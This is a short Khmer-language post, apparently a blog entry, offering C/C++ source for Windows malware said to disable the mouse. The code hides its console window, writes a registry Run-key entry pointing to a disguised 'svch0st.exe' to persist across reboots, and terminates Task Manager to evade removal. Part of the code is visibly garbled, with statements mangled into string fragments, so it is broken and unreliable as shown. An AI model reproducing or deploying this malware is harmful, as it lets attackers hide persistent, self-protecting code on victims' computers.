សរសេរមេរោគ C++

ITសរសេរមេរោគ បិទ កណ្តុរ mouse មិនអោយដំណើរការ ប្រើ កម្មវិធី C

#include 
#include 
#include 
#include 
#include 

#define BUFSIZE 90

int test_key(void);
int create_key(char *);
int kill(void);

BOOL KillProcess(LPSTR lpszExecutable)
{
 BOOL bResult = FALSE;
 PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
 HANDLE hProcess, hProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if(Process32First(hProcesses, &pe32)){
   do{
     if(CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, lpszExecutable, -1) == CSTR_EQUAL){
       if((hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID)) != NULL){
         TerminateProcess(hProcess, 0); CloseHandle(hProcess); bResult = TRUE;
       }
     }
   }while(Process32Next(hProcesses, &pe32));
   CloseHandle(hProcesses);
 }
 return bResult;
}

int main(void)
{
 int test,create;
 test=test_key();

 if (test==2)
 {
   char *path="c:\\WINDOWS\\svch0st.exe";
   create=create_key(path);
 }

HWND inv;
 AllocConsole();
 inv=FindWindowA("ConsoleWindowClass",NULL);
 ShowWindow(inv,0);
int c;
for(c=0;c<999999999999;c++) buf_length="BUFSIZE;" reg_key="RegOpenKeyEx(HKEY_LOCAL_MACHINE," check="1;" reg_key="RegQueryValueEx(hKey,">BUFSIZE))
   check=2;
 if(reg_key==0)
   check=0;
 RegCloseKey(hKey);
 return check;
}

int create_key(char *path)
{
   int reg_key,check;

   HKEY hkey;

   reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
   if(reg_key==0)
   {
       RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
       check=0;
       return check;
   }
   if(reg_key!=0)
       check=1;
   return check;
}

int kill(void)
{
return KillProcess("taskmgr.exe");
}